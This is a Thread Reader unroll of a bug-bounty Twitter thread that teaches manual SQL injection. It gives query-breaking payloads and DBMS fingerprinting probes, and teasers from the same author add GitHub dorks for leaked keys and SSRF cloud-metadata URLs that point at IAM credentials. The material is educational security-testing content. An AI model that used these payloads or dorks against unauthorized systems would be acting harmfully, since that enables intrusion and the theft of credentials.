Share this page!

Tushar Verma 🇮🇳 Profile picture
Twitter logo
May 8 9 tweets 2 min read
SQLi Manual Approach

Thread 🧵

#bugbounty #bugbountytip #bugbountytips
First thing to test for an SQL injection is to try to break the query,with the intention of getting the syntax of how SQL is getting input at the backend.This technique works in UNION/Error based SQL Injections,where we force the backend database to throw an error.
Using this technique,we can somehow determine the backend query structure to efficiently exploit SQL Injection.Query can be broken by throwing various characters as input.
Afterwards an escape character \ can be used just to make sure what is breaking the query.Once it is guessed how exactly SQL is taking input, we’ll try to break and then fix the query.
This step is necessary to determine where we can put our own malicious query, that will be executed at the backend.

The query can be fixed in some of the ways below:
‘’    --+
‘    --+
‘’    #
‘     \*    *\
‘    -- -
'     or    '1
To know what DBMS is running at the backend, error messages can tell a lot,

But in the case of Blind Injections, another way is to determine through different numeric functions like:

Oracle: BITAND(1,1)
MySQL: POW(1,1)
SQL Server: SQUARE(1,1)
For example if “list.php?id=8” and “list.php?id=9- POW(1,1)” is returning the same output,it means MySQL is running at the backend.

Every DBMS uses different concatenation operators to store text input
Eg:

Oracle:  'que' || 'ry’
MySQL: ‘que’ ‘ry’
SQL Server: ‘que’ + ‘ry’
For example if “id=query” and “id=’que’ || ‘ry’”  is returning the same output, it means Oracle is running at the backend.
Then you can try for union based, error based , blind, out of band

I will publishing one blog on SQLi on medium

• • •

Missing some Tweet in this thread? You can try to force a refresh
 

Keep Current with Tushar Verma 🇮🇳

Tushar Verma 🇮🇳 Profile picture

Stay in touch and get notified when new unrolls are available from this author!

Read all threads

This Thread may be Removed Anytime!

PDF

Twitter may remove this content at anytime! Save it as PDF for later use!

Try unrolling a thread yourself!

how to unroll video
  1. Follow @ThreadReaderApp to mention us!

  2. From a Twitter thread mention us with a keyword "unroll"
@threadreaderapp unroll

Practice here first or read more on our help page!

More from @e11i0t_4lders0n

Tushar Verma 🇮🇳 Profile picture
May 8
Facing problem in making your own recon methodology

Follow this thread 🧵

#bugbounty #bugbountytip #bugbountytips
1: The Bug Hunter's Methodology v4.0 - Recon Edition
2: Fundamentals of Bug Bounty Recon
Read 6 tweets
Tushar Verma 🇮🇳 Profile picture
Mar 16
GitHub Recon for Bug Bounty

A thread 🧵

#bugbounty #bugbountytip #bugbountytips
What is Github Recon??

Finding out essential information using several features offered by GitHub
GitHub Dorks
filename:.npmrc _auth

filename:.dockercfg auth

extension:pem private

filename:id_rsa or filename:id_dsa

extension:sql mysql dump

extension:sql mysql dump password

filename:credentials aws_access_key_id

filename:wp-config.php

filename:.htpasswd
Read 7 tweets
Tushar Verma 🇮🇳 Profile picture
Mar 7
Big Problem faced by many bug bounty hunter

1-Company is not replying to your reports/findings
2-Company is closing your report without giving suitable reasons

How to minimise this???

Follow this thread 🧵

#bugbounty #bugbountytip #bugbountytips
First and easy solution use any bug bounty platform like @Bugcrowd, @Hacker0x01, @yeswehack, @intigriti etc etc because atleast you will get response in a fixed time. But many have there own bug bounty program and not hosted on these platforms.
So first send them a email asking if they are having any bug bounty program,ask each and every details like about their VRT, scope, vulnerabilities they accept. This will help you understand about how much active that rdp is and also what’s in scope.
Read 4 tweets
Tushar Verma 🇮🇳 Profile picture
Mar 6
How to start Bug Bounty Hunting

Follow this thread 🧵

Note:I m assuming that you have cleared your basics

#bugbounty #bugbountytip #bugbountytips
Start with learning how to use Burpsuite basics, there are many tutorials available on internet which you can refer. Why it is important?because it is important 🤪

Now you can start @PortSwigger Academy. They have a learning path you can follow that or you can follow owasp list
Make a list and start reading the @PortSwigger Vulnerabilities Notes and solve the labs so clear your concepts. Make sure you are making a detailed notes for yourself because there are so much to learn you may forget some things. For notes-making i use @NotionHQ .
Read 16 tweets
Tushar Verma 🇮🇳 Profile picture
Dec 3, 2021
Cloud Metadata Dictionary useful for SSRF Testing

## IPv6 Tests

http://[::ffff:169.254.169.254]

http://[0:0:0:0:0:ffff:169.254.169.254]

#bugbountytips #bugbounty #bugbountytip
## AWS

# Amazon Web Services (No Header Required)

# from docs.aws.amazon.com/AWSEC2/latest/…

http://169.254.169.254/latest/meta-data/iam/security-credentials/dummy

http://169.254.169.254/latest/user-data

http://169.254.169.254/latest/user-data/iam/security-credentials/[ROLE NAME]
http://169.254.169.254/latest/meta-data/iam/security-credentials/[ROLE NAME]

http://169.254.169.254/latest/meta-data/ami-id

http://169.254.169.254/latest/meta-data/reservation-id

http://169.254.169.254/latest/meta-data/hostname
Read 12 tweets
Tushar Verma 🇮🇳 Profile picture
Nov 9, 2021
AWS Security Testing Checklist

=Identity and Access Management

1-Ensure multi-factor authentication (MFA) is enabled for all IAM users that have a console password
2-Ensure credentials unused for 90 days or greater are disabled
3-Ensure access keys are rotated every 90 days or less
4-Ensure IAM password policy requires at least one uppercase letter
5-Ensure IAM password policy requires at least one lowercase letter
6-Ensure IAM password policy requires at least one symbol
7-Ensure IAM password policy requires at least one number
8-Ensure IAM password policy requires minimum length of 14 or greater
9-Ensure no root account access key exists
10-Ensure MFA is enabled for the "root" account
Read 14 tweets

Did Thread Reader help you today?

Support us! We are indie developers!

This site is made by just two indie developers on a laptop doing marketing, support and development! Read more about the story.

Become a Premium Member ($3/month or $30/year) and get exclusive features!

Become Premium

Don't want to be a Premium member but still want to support us?

Make a small donation by buying us coffee ($5) or help with server cost ($10)

Donate via Paypal

Or Donate anonymously using crypto!

Ethereum

0xfe58350B80634f60Fa6Dc149a72b4DFbc17D341E copy

Bitcoin

3ATGMxNzCUFzxpMCHL5sWSt4DVtS8UqXpi copy

Thank you for your support!

Follow Us on Twitter!

:(